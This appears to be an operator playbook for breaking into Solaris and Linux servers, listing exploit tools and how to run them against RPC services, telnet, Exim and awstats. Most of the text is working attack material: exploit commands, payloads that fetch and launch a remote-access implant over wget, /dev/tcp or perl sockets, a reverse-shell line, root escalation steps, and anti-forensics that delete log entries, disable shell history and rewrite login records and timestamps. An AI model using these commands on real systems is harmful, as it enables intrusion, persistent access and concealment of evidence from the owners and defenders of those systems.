expiretrachea.pl -h 127.0.0.1 -c PITCH_IP
# clean logs:
### /server/ftp/log/httpd: referer_log, ssl_request_log, and access_log
#grep -v "-" /server/ftp/log/httpd/referer_log > /tmp/.scsi/c; cat /tmp/.scsi/c
> /server/ftp/log/httpd/referer_log
pwd
-lt /server/ftp/log
-lt /server/ftp/log/httpd
-lt /
df -k
w
ps -auxww
-cd /var/tmp
-get /server/ftp/log/messages
-tail /server/ftp/log/messages
grep -v DSADMIN /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
grep -v PITCH_IP /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
-get /server/ftp/log/httpd/referer_log
-tail /server/ftp/log/httpd/referer_log
grep -v prepend /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/h
ttpd/referer_log
grep -v x90 /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd
/referer_log
grep -v admin /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/htt
pd/referer_log
grep -v C /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/r
eferer_log
-get /server/ftp/log/httpd/access_log
-tail /server/ftp/log/httpd/access_log
grep -v PITCH_IP /server/ftp/log/httpd/access_log > m; cat m > /server/ftp/log/h
ttpd/access_log
-get /server/ftp/log/httpd/ssl_request_log
-tail /server/ftp/log/httpd/ssl_request_log
grep -v PITCH_IP /server/ftp/log/httpd/ssl_request_log > m; cat m > /server/ftp/
log/httpd/ssl_request_log
-get /server/ftp/log/httpd/error_log
-tail /server/ftp/log/httpd/error_log
grep -v PITCH_IP /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/ht
tpd/error_log
grep -v db_sql /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/http
d/error_log
-rm m
-rm /tmp/.scsi/sendmail /tmp/.scsi/getopt /tmp/.scsi
-lt
###################################################
### NFTP
###################################################
# nopen ftp
############
ourtn -lue PITCH_IP
noclient PITCH_IP:PORT
-tunnel 12121 udp # NOTE: As of v1.1, if this is not there, the
error message will offer it as a pastable.
# CLEAN UP
/var/log/messages
/var/log/auth
##################################################3
############################################################
# SSH
############################################################
### redirector
-tunnel
l 22 TARGET_IP
# Multiple targets? If so, wipe your known_hosts file locally between each:
cat /dev/null > ~/.ssh/known_hosts
ssh -x iga@127.0.0.1 "/bin/sh"
# or
ssh -p RANDOM_PORT -x username@127.0.0.1 /bin/sh
# or this eliminates the lack of tty problem
ssh -p RANDOM_PORT -x username@127.0.0.1
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
w
id
uname -a
ls -la /boot
mkdir /tmp/.scsi;cd /tmp/.scsi;pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -la
# LINUX:
# start nopen so you can upload forkpty to be able to su (ptrace didn't work)
-put forkpty f
./f
# or:
su
############## upload nopen:
###
### using uudecode pastable
###
# if no uuencode and no ftshell (if you used telnet) try:
# locally run:
uudecode.pastable /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redha
t-5.0 sendmail
# paste the perl code that it spits out (hitting return after the last character
), then
# paste sendmail that is brought up in gedit
# you may need to hit Ctl-C after you see the upload complete
# Note: the upload may not echo to the screen until after the Ctl-C
###
### using cat & /dev/tcp:
###
# on redir:
-tunnel
r RANDOM
# netcat
nc -l -v -p RANDOM < sendmail
# on target:
cat /dev/tcp/PITCH_IP/RANDOM > sendmail
###
### using wget:
###
# If none of the above work:
# Locally:
echo -e 'HTTP/1.0 200\n' > new
cat new ../up/morerats/noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > /current/up
/sendmail
nc -l -v -p RANDOM < sendmail
# on redir:
-tunnel
r RANDOM
# on target
wget http://210.56.8.10:RANDOM/sendmail
ls -la
chmod 700 sendmail
PATH=./sendmail
-nstun TARGET_IP
###
### using secure copy
###
# if that doesn't work, try secure copy:
# on redir:
-tunnel
l RANDOM TARGET_IP 22
###
### Want netcat? netcat nc -- how abuot perl instead?
### using target's perl to open a socket, either
### callback or listen on target.
###
my
:%s/PERLNAME/PERLNAME/g
:%s/PERLRANDOMPORT/PERLRANDOMPORT/g
:%s/PERLCALLBACKIP/PERLCALLBACKIP/g
:%s/PERLCALLFORWARDIP/PERLCALLFORWARDIP/g
:%s,PERLUPLOADFILE,PERLUPLOADFILE,g
`y
#### CALLING out from target
# LOCALLY use netcat to upload file
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE
# or if you want a loop to keep listening after each upload
while [ 1 ] ; do \
echo starting listen on PERLRANDOMPORT ; \
date ; \
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE; \
echo done ; \
sleep 3 ; \
done
# tunnel
-tunnel
r PERLRANDOMPORT
# ON TARGET
perl -MIO -e 'close(STDIN);$c=IO::Socket::INET->new("PERLCALLBACKIP:PERLRANDOMPO
RT")or exit1;binmode($c);open(O,">PERLNAME")or exit 1;binmode(O);select O;$|=1;
print O while (<$c>);close(STDOUT);close($c);unlink("PERLNAME") unless (-s "PERL
NAME");'
###
### to elevate using EVENTSTART(?) use whatever name you want
###
-put /current/up/h h
# in your ssh or telnet masquerade window:
./h
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
cd /tmp/.scsi;pwd
chmod 700 sendmail
chown root:root /tmp/.scsi
PATH=. sendmail
### in another window
-nstun TARGET_IP 32755
-rm sendmail
##### Don't forget to burn the unprivileged nopen
# Cleanup
/var/log/secure
/var/log/messages
/var/log/lastlog
/var/log/wtmp
/var/run/utmp
###########################################################
# BOSSLAD
###########################################################
### when nsrexec is there but NOT with nsrstatd???
### like a tcp version of BS
### always uses port 7937
### ./bll.tnc.gr
# Before running this script, you first need to run the following:
# nc -l -p localPort < file2Xfer&Run.uu
# (nc must be in your path; it's also run w/in this script)
# where file2Xfer&Run.uu is a compressed, uuencoded file.
# Usage: bll.tnc.gr
# [options] -- [options to <file2Xfer&Run>]
# -i <target ip> (required)
# -l <callback ip> (required)
# -p <callback port> def = 32177
# -f <file2Xfer&Run> (required)
# -D <remoteDir> def= /tmp/.X11R6
#
# ./bll.tnc.gr -i 66.128.32.67 -l 67.233.61.230 -p 24792 -f sendmail -D /tmp/.sc
si
packrat NETCAT_PORT
### On redirector:
-tunnel
l 7937 TARGET_IP
r NETCAT_PORT
### On local machine:
### Ex.: ./bll.tnc.gr -i 127.0.0.1 -l 150.27.1.11 -p 45226 -f sendmail -D /tmp/
.scsi
./bll.tnc.gr -i 127.0.0.1 -l PITCH_IP -p NETCAT_PORT -f RAT_NAME -D /tmp/WORK_DI
R
### Once upload of RAT completes, connect to target from PI with nopen:
-nstun TARGET_IP
### Cleanup
-ls /nsr/cores
-ls /nsr/cores/sh
-cat /nsr/cores/sh/*
rm /nsr/cores/sh/*
-rm /nsr/cores/sh
-touch SOMEFILE /nsr/cores
-ls /nsr/logs
-ls /nsr/logs/daemon.log
-get /nsr/logs/daemon.log
wc -l /nsr/logs/daemon.log
head -## /nsr/logs/daemon.log > n
-cat n
cat n > /nsr/logs/daemon.log
touch SOMEFILE /nsr/logs/daemon.log
#########################################################
# ELVISCICADA
#########################################################
### only up to ealry Sol2.9; Sol2.10 not vulnerable
### snmpXdmid (/usr/lib/dmi/dmispd) daemon program (RPC program 300598 version 1
)
# Req:
# 1. you must know the OS
# 2. you must ba able to connect with TCP (for when you get the root shell)
# 3. /usr/lib/dmi/dmispd must be running on the target system,
# and you must be able to successfully talk to its ___UDP___ port.
# This is usually evidenced by RPC program 300598 version 1
# during rpcinfo -p and UDP rpcinfo -n "touches" of the target, such as...
#
# $ rpcinfo -p target
# ...
# 300598 1 udp 32879
# 300598 1 tcp 32796
# ...
# $ rpcinfo -n 32879 -u target 300598
# program 300598 version 1 ready and waiting
# $
#
# if rpcinfo -n returns "ready and waiting", ELVISCICADA should be ready to sin
g.
### -scan brpc TARGET_IP
### look for program 300598 version 1 of dmispd and make note of UDP port
### test that TCP connects get thru to the default shellcode port (32387)
### (being refused is still good - means it went thru)
### If the port doesn't answer, pick another port that works, AND add the "-s" o
ption
### using the new (random) port
# ON PI:
-tunnel
l 32387 TARGET_IP
# Locally
telnet 127.0.0.1 32387
### Usage:
./dw.linux
### Use the lowest number for the target OS and increment by one for subsequent
attempts:
./dw.linux -t <VALUE> -i TARGET_IP -s RANDOMSHELLPORT -p UDPPROGRAMPORT
./dw.linux -t <VALUE> -i TARGET_IP -p UDPPROGRAMPORT
### If redirected:
# On PITCHIMPAIR
-tunnel
l RANDOMSHELLPORT TARGET_IP
u PROGRAMPORT TARGET_IP
r NETCATPORT
# Locally:
./dw.linux -t <VALUE> -i 127.0.0.1 -s RANDOMSHELLPORT -p UDPPROGRAMPORT -w 10 -b
1024
./dw.linux -t <VALUE> -i 127.0.0.1 -p UDPPROGRAMPORT
### Cleanup:
# possible core file in /? or /usr/lib/dmi/dmispd?
-ls /core /usr/lib/dmi/dmispd
#/var/adm/messages (for failures)
-tail /var/adm/messages
#########################################################
# EMPTYCRISS
#########################################################
### No redirection:
### This will create the output to paste into the telnet window:
### local unscripted window:
./emptycriss TARGET_IP
# or
perl ./emptycriss TARGET_IP
### op window
### paste instructions from 1st window into this one
### Ex.:
#ATTACKER# telnet
#
#ATTACKER# telnet> environ define TTYPROMPT abcdef
#
#ATTACKER# telnet> o victimip
#
#ATTACKER# telnet> root c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c\n
##
##id
##uid=0(root) gid=1(other)
##uname -a
### if it fails, try again as /bin
ftshell telnet
### Redirected:
-tunnel
l RANDOM TARGET_IP 23
#
# In unscripted window
#
./emptycriss 127.0.0.1
# In scripted op window:
ftshell telnet
### NOTE: be sure to open 127.0.0.1 on the RANDOM redirected port
#Ex:
#o 127.0.0.1 RANDOM
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail
##########################################
# EASYSTREET
##########################################
### cmsd 100068
### UDP is best since it's a single packet to exploit
-scan rpc TARGET_IP # look for 100068 and make note of port
### UDP is best since it's a single packet to exploit
### with -sploit:
#-sploit will ask you which exploit to try.
# Select 'CM' (calendar manager)
# Another window will pop up to run the exploit
# This window will pause to allow you to verify the command it will run.
# The command should look something like this (the ports will vary):
# -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120
-c
# Append '-T 2' to the front of the line so that it looks like this:
# -T 2 -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n
26120 -c
# Then press return.
# The exploit window will prompt you to set up a listener like this:
# You must establish a NOPEN listener on 192.168.250.3:SOME_RANDOM_PORT
-nrtun RANDOM (as indicated in the -sploit exploit prompt)
#Press enter
#Now the exploit will occur and, after a couple of minutes, it will call back
#to your listener.
#Once the callback occurs, take the following steps:
#In a local window
LOCAL>closetunnel
#Press 'A' to abort the autodone commands
#Delete the files created by your exploit
#There should be one lock file and one callog file
-lt /var/spool/calendar
-rm /var/spool/calendar/THE_TWO_MOST_RECENT_FILES
#Use touch to set the directory timestamp back
-lt /var/spool
-touch /var/spool/SOME_OLDER_DIRECTORY /var/spool/calendar
### Usage:
./cmsex
./cmsex.auto
### no redirection
./cmsex -i TARGET_IP -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet LOCAL_IP NETC
AT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T <target_type>
(-u RANDOM | -t RANDOM)
### Redirected:
-tunnel
u RANDOM TARGET_IP CMSD_PORT
r NETCAT_PORT
### when the upload is done, kill the netcat, then try connecting in
-nstun TARGET_IP
-rm sendmail
### Logging:
-lt /var/adm
-lt /var/spool/calendar
#########################################################
# EBB
#########################################################
### Sol2.10 vulnerable for only program 100230 metamhd using ebbshave.v4
### ./ebbshave.v5 is a wrapper program for ebbnew_linux exploit for Sparc Solari
s RPC services
### Important: ebbnew_linux must be in your PATH
command that is useful:
rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
usage: ./ebbshave.v5 -o -v -t -p
-o : one of the following options [1-19]:
1, "5.9 metamhd", program # = 100230,
2, "5.8 ruserd", program # = 100002, NOTE = version 1
3, "5.8 ruserd", program # = 100002, NOTE = version 2 - must start servi
ce first by using rpcinfo -n before using this option
4, "5.8 ttdbserverd", program # = 100083,
5, "5.8 cachefsd", program # = 100235, NOTE = version 1 - Start with opt
ion #6 first, if it fails then try this option
6, "5.8 cachefsd", program # = 100235, NOTE = version 2 - must start ser
vice first by using rpcinfo -n before using this option
7, "5.8 metad", program # = 100229, NOTE = version 1
8, "5.8 metad", program # = 100229, NOTE = version 2 - must start servic
e first by using rpcinfo -n before using this option
9, "5.8 metamhd", program # = 100230,
10, "5.7 ruserd", program # = 100002, NOTE = must start service first by
using rpcinfo -n before using this option
11, "5.7 kcms_server", program # = 100221,
12, "5.7 cachefsd", program # = 100235,
13, "5.7 ttdbserverd", program # = 100083,
14, "5,7 dr_daemon", program # = 300326,
15, "5.6 ruserd", program # = 100002,
16, "5.6 kcms_server", program # = 100221,
17, "5.6 cachefsd", program # = 100235, NOTE = version 1 - Start with op
tion #18 first, if it fails then try this option
18, "5.6 cachefsd", program # = 100235, NOTE = version 2 - must start se
rvice first by using rpcinfo -n before using this option
19, "5.6 ttdbserverd", program # = 100083,
-v : the program version number you are exploiting which is obtained from rpcinf
o output
-t : targets ip address
-p : port number rpc program is listening on
example:
./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
If you fail to exploit using ./ebbshave.v5, try bruteforcing using ebbshave.v4
### 1. Use the following command to look for a suitable program to hit
### Redirection:
-tunnel
l 111 TARGET_IP
### Local box:
./ebbshave.v5
ebbshave -p 127.0.0.1
### 2. Verify the portnum will work (should respond "ready and waiting)
### Use either:
# rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
# Ex.: ebbshave -n 32776 -t targetip 100229
### Redirector:
-tunnel
l PORTNUM TARGET_IP
### Locally, see if the program you want is a viable option:
./ebbshave -n portnum -t host prognum
./ebbshave -n PORTNUM -t 127.0.0.1 PROGNUM
### Use this for usage statement
./ebbshave
### If that doesn't work, try without the best guess (B) option, or maybe increa
se th
### timeout period (W)
ebbshave -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
###### Cleanup:
/usr/openwin/bin/core
/var/adm/messages
Other cores locations?
Always look at utmp, wtmp,etc
#########################################################
# BS - BLUE
#########################################################
# ../bin/bs.tr -h
#
# Usage:
# [E=ratpreargs] [A=ratpostargs] bs.tr remoteIP remoteHost \
# [remoteDomain] \
# sadmindPort remoteDir remoteName localIP localPort
#
# ratpreargs : the string put on remote command line right after PATH=. a
nd
# before remoteName (e.g. E='C="-c LOCALIP port"' or
# E='C="-l listenport"')
#
# ratpostargs : the string put on remote command line after running remote
Name
#
#
# Command sent to bs will be munged from:
#
#CMD="mkdir -p ${REMOTE_DIR} && cd ${REMOTE_DIR} && telnet ${LOCAL_IP} ${LOCAL_P
ORT} < /
#dev/console | uudecode > /dev/null 2>&1 && uncompress -f ${REMOTE_FNAME}.Z && c
hmod 755
# ${REMOTE_FNAME} && PATH=.${RAT_PREARGS} ${REMOTE_FNAME}${RAT_POSTARGS}"
### TRICK - use -A option to get its archtype back
### TRICK - give a bad hostname to see if it's running in secure mode; if it com
plains, then
### it's still vulnerable, and work out the other options; if there'
s not response
### try another bad name; if still no response, then it's running in
secure mode and
### not vulnerable
### Scan target
#rpcinfo -p TARGET_IP
#
#rpcinfo -n BSPORT -u TARGET_IP 100232
#rpcinfo -n BSPORT -t TARGET_IP 100232
-scan rpc TARGET_IP
mx
:%s/SADMIND_PORT/SADMIND_PORT/g
:%s/REMOTE_DIR/\/tmp\/WORK_DIR/g
`x
###### Start netcat
packrat NETCAT_PORT
### Redirection:
### E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET-NAME TARGET-DOMAIN SADMIND-PORT
REMOTE-DIR RAT-NAME PITCH-IP NETCAT-PORT
### No domainname:
E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NA
ME PITCH_IP NETCAT_PORT
### With domainname:
E='D="-l RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME TARGET_DOMAIN SADMIND_PORT REM
OTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
### Callback:
E='D="-c PITCH_IP RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_D
IR RAT_NAME PITCH_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the conne
ction to upload nopen.
# Hit Ctrl-C on your nc
###### Cleanup:
# usually nothing
###########################################################
# GS - GREEN
###########################################################
gs.auto
Usage: $PROG -i <rem_ip> [ options ]
-i IP IP of target machine (NO DEFAULT)
-g opt Change default GS option from ./$GS_OPTION to \"./opt\"
(can be grins, frowns or sneer).
-C str Change default community string from public to \"str\".
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: $CALLBACKDELAY seconds). Callback is to -l IP.
-k Use ksh method instead of telnet/uu*code.
-z Do NOT use uncomrpess at the either end
-r rat name of rat on target (Default: sendmail)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
\"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1\".
If not provided or no match, /current/up/noserver is assumed.
-G Retry exploit--using already uploaded RAT (useful when you need
to try adding -P option or try another RAT callback port).
# Tunneling
# on redirector
-tunnel
u 161 TARGET_IP
r NETCAT_PORT
s
# logging depends on sneer(2.6) or frowns(2.7+)
# With redirector:
#./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# NO tunneling
# Local window
#./gs.os.gr -i TARGET-IP -g <frowns/sneer> -l LOCAL-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i TARGET_IP -g <frowns/sneer> -l LOCAL_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# Both cases:
#you wait 4 minutes, and you should see the upload of nopen
# Ctrl-C your nc
### Connect to target:
### Straight connect (no redirection)
cd ../down
../bin/noclient TARGET_IP
### Connect using redirector:
-nstun TARGET_IP
### Cleanup:
### run cleaner after frowns (or else another callback in 4 minutes) (might be a
utomatic now)
### rm /tmp/mibiisa_ps_data
### toast utmp, wtmp, utmpx, wtmpx
###############################################
# YS - YELLOW
##############################################
### New way:
Usage: ys.auto -i TARGETIP [options]
-i IP IP of target machine (NO DEFAULT)
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: 3 seconds)
-z Do NOT use uncomrpess at the either end
-e Do NOT use "2>&1" on target. Fouls up in some shells.
-r rat name of rat on target (Default: sendmail)
-x # port to start mini X server on (Default: random port)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1".
If not provided or no match, /current/up/noserver is assumed.
NOTE: -x # and -p# can be the same, even in callback mode. ys.auto
provides
a mechanism to allow netcat callback to finish, and its -tunnel to
close before the NOPEN server calls back on the same port.
examples:
ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir
ys.auto -i 10.0.3.1
ys.auto -i TARGET_IP -l REDIRECTOR_IP
NOTE: The only REQUIRED ARGUMENT is now -i
The best way to back out of ys.auto once done (whether or not you get on
target) is to kill off the packrat window first with ^C then ^D. Then
kill of the xc window the same way, finally kill the ys.auto.
ys.auto Version 1.4.1.1
### Old Way:
mx
:%s/XSERVER_PORT/x/g
x
-scan xwin TARGET_IP
### Locally:
packrat NETCAT_PORT
#or
packrat -n /current/bin/nc.YS NETCAT_PORT
######### YS With no redirection:
### Local Window 1:
#./wrap-sun.sh -l LOCAL-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WO
RK-DIR
./wrap-sun.sh -l LOCAL_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WOR
K_DIR
### Local Window 2:
#./xc -x LOCAL-IP -y XSERVER-PORT -s LOCAL-IP TARGET-IP
./xc -x LOCAL_IP -y XSERVER_PORT -s LOCAL_IP TARGET_IP
# Ex:
#/current/bin/catflap_sparc -7 -c "/bin/sh"
/current/bin/catflap_sparc -<option_num> -c "/bin/sh"
### on redirector
-rtun NETCAT_PORT
### Local window
ftshell telnet localhost 2323
### paste catflap output once you get telnet prompt
<ctrl><d>
### should get root prompt
### Now upload rat
### with ftshell:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail
### now root on target (do the following if you did NOT use ftshell)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
### <ctrl><c> or <ctrl><d> in root target window/nc once
### you have nopen on target
-put /current/up/toast t
-ls -t /var/adm /var/log
### look at entries
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
############################################
# EXPOSITTRAG
############################################
# exploit pcnfsd version 2.x (fails on v.1 or 3+)
#
# whatever redirector you use, port 514 cannot
# be in use
netstat -an | grep 514
# to determine the version
-scan rpc TARGET_IP
-tunnel
u UDP_PCNFSD_PORT TARGET_IP
# LOCAL
#./prout -w TARGET_IP UDP_PCNFSD_PORT
./prout -w 127.0.0.1 791
Profiles:
[0] Gentle Persuasion
[1] Redhat 9
./electricslide -t 1 -l LOCAL_IPorPITCH_IP TARGET_IPor127.0.0.1
###################### ELMIRASIGNET #####################
# vulnerability in awstats software < 6.3 on apache server
# jogswirl
-tunnel
l 80 TARGET_IP
r 5555
# vulnerable ?
-scan http TARGET_IP
# galeon http://127.0.0.1/cgi-bin/awstats.pl
Advanced Web Statistics 6.1 (build 1.704)
# ./xp_awstats.pl -i 127.0.0.1 -d /cgi-bin/awstats.pl -e 0 -c "uname -a;ls
-la;w"
./xp_awstats.pl -i<host> -d<dir/file> -e<exploit method number> -c<commands to r
un on target>
-i <127.0.0.1>
-d </cgi-bin/awstats.pl>
-p <port>
-e <exploit method>
0: ?pluginmode=:system("CMD");
1: ?configdir=|CMD|
2: ?update=1&logfile=|CMD|&framename=mainright
-c <Command to run on target>
Examples:
1) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"uname -a;ls -la
;w"
2) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"(mkdir /tmp/.sc
si; cd /tmp/.scsi; /usr/bin/wget http://
PITCH_IP:5555/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:9999 PATH=. sen
dmail) 2>/dev/null"
-nstun TARGET_IP:9999
###################### ERRGENTLE ##########################
# exploits vulnerability Exim 3.22 thru Exim 3.35 Mail Transfer Agent
# brute force
###### Version 3
# Upload on PITCHIMPAIR and run
netstat -an | grep LISTEN | grep 113
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/xp-exim-3-remote-solaris-v3 x
-shell
./x -i TARGET_IP -p 25 -d SCAPEGOAT_DOMAIN -u nobody -t
# states if vulnerable; hit return to throw if vulnerable
# takes about 1000 hits; scrolls fast; will get root prompt
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
pwd
# will put you in /usr/exim-3.33/spool
PATH=. crond
<ctrl><d>
exit
-rm /tmp/.scsi/x /tmp/.scsi
###### Version 2
-tunnel
l 25 TARGET_IP
r 113
r RANDOM_PORT
# test susceptability:
-scan mail TARGET_IP
./xp-exim-3-v3 -i 555.1.2.150 -p 25 -t -d a.jetson.net -u nobody
./xp-exim-3 -i 127.0.0.1 -p 25 -c "sh </dev/tcp/PITCH_IP/RANDOM_PORT >&0 2>&0" -
t
# response should be something like:
# It's vulnerable! Hit a key to start
################################################
### VS - VIOLET
### You need to do this exploit from a box very close (ideally on the same net)
### as the target because of the traffic it generates.
### Reference the README file in /current/bin for help on the new version
################################################
#Start Xserver on local ops machine prior to logging in
### VS version5
xhost + <TARGET_IP or PITCH_IP>
iptables -F
netstat -an |grep 6000 (make sure local xserver is listening)
### run the test version first to get the times (if vulnerable):
-put /current/bin/vs.gettime.sol.sparc v
rpcinfo -p TARGET_IP
#Ex: ./v -i 202.83.160.51 -h ATMNMS -n 34647 -p 443
./v -i TARGET_IP -h HOSTNAME -n TCP_PROGRAMPORT -p CALLBACK_PORT
### hit return when prompted; once you get the times for the cookie
### you can throw the attack thru the redirector
-rm v
-cd /tmp
-rm .scsi
### set up the tunnels, using whichever ports you think can call back:
-tunnel
l TCP_PROGRAMPORT TARGET_IP
r 8080 127.0.0.1 6000
r 443
###old way:
#Misc ex:
./vs.linux -i 555.1.2.79 -h blade1000 -D -q 554.208.30.2 -p 6000 -v 5 -r 128963
7086 -n 52213
mkdir /tmp/.scsi; cd /tmp/.scsi; telnet local_ip port </dev/console |uudecode; l
s -al
uncompress sendmail.Z; chmod +x sendmail; PATH=. sendmail
###################################################3
### TTSESSION (rpcttjamsession)
###################################################3
### pops a terminal back to your box
### make sure Xserver is running locally (may need to restart box):
netstat -an | grep 6000
### Allow a window to pop up on your local display:
xhost +
### and maybe:
iptables -F
### see if you'll need to elevate, see who is running that session:
### superuser is golden
-scan brpc TARGET_IP
mx
:%s/RANDOM_PORT/RANDOM1/g
:%s/DISPLAY_PORT/RANDOM2/g
:%s/TTSESSIONPROGNUM/TTSESSIONPROGNUM/g
:%s/TTSESSIONPROGPORT/TTSESSIONPROGPORT/g
`x
### Get your netcat ready
packrat NETCAT_PORT
### redirector
-tunnel
l RANDOM_PORT TARGET_IP TTSESSIONPROGPORT
r DISPLAY_PORT 127.0.0.1 6000
r NETCAT_PORT
### use info from highest ttsession portinfo:
# Usage:
#./rpcttjamsession [-p port] [-r rpc_program] [-v rpc_version][-d display_ip] [-
n display_port] [-c cookie_string] [-7] [-t] hostname
# -d display_ip - IP address to set DISPLAY
# -n display_port - redirection port for Xwindows, default is 6000.
# -t - test the RPC call, do not send message.
# -7 is for Solaris 7 default rpc program number
# -c - User's Cookie as a character string.
# (-v = rpcversion from scan results)
### REDIRECTED:
# Ex. - ./rpcttjamsession -d 203.555.28.242 -v 4 -n 22222 -p 32782 -r 134217727
9 127.0.0.1
./rpcttjamsession -d PITCH_IP -v RPCVERSION -n DISPLAY_PORT -p RANDOM_PORT -r TT
SESSIONPROGRAMNUMBER 127.0.0.1
### NO REDIRECTOR:
./rpcttjamsession -d LOCAL_IP -v RPCVERSION -n 6000 -p TTSESSIONPROGPORT -r TTSE
SSIONPROGRAMNUMBER TARGET_IP
### Be patient. Check your tunnels and watch for activity in your tcpdump.
### If all goes well, a target window will pop up in the left corner of your scr
een.
### Paste commands in it and GET MOUSE OUT OF THE BOX (generatesmore traffic bec
ause of X)
### In remaining local windows, connect to PI host, then connect to TARGET: ####
######
-rm sendmail
### to PI host:
cd /current/down
../bin/noclient PITCH_IP:NETCAT_PORT
### from PI host to TARGET:
#-nstun TARGET_IP RAT_PORT
#-readrc ../etc/norc.osf1
-nstun TARGET_IP RAT_PORT
#########################################################
# ENERGIZERBUNNY
#########################################################
# elevate to root: Sol 2.3-2.9
-put /current/up/eb eb
-put /current/up/mod32 mod32
# or -put /current/up/mod64 mod64
./eb -h
./eb [-k 32|64] [-p <pid>] [-u <uid>] [-g <gid>] [-n]
./eb
id
### start a new nopen as root:
PATH=. D="-l RANDOM" sendmail
-nstun TARGET_IP RANDOM
-rm eb mod32
#########################################################
# WALNUTSMOOTHY
#########################################################
# elevate to root: Sol 2.5.1-2.8
mkdir /tmp/1291aaab/
-put /current/up/efs f
cp f /tmp/1291aaab
-shell
cd /tmp/1291aaab
pwd
./f
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
cd /tmp/.scsi
head /etc/passwd
### start a new nopen as root while in -shell:
PATH=. D="-l RANDOM" sendmail
exit
### connect to privileged nopen:
-nstun TARGET_IP RANDOM
### burn unprivileged nopen
### cleanup files
-rm /tmp/1291aaab/f f sendmail
-rm /tmp/1291aaab
-lt /tmp
#########################################################
# EXTREMEPARR
#########################################################
# elevate to root: Sol 2.6-2.9
###
### make sure this exists:
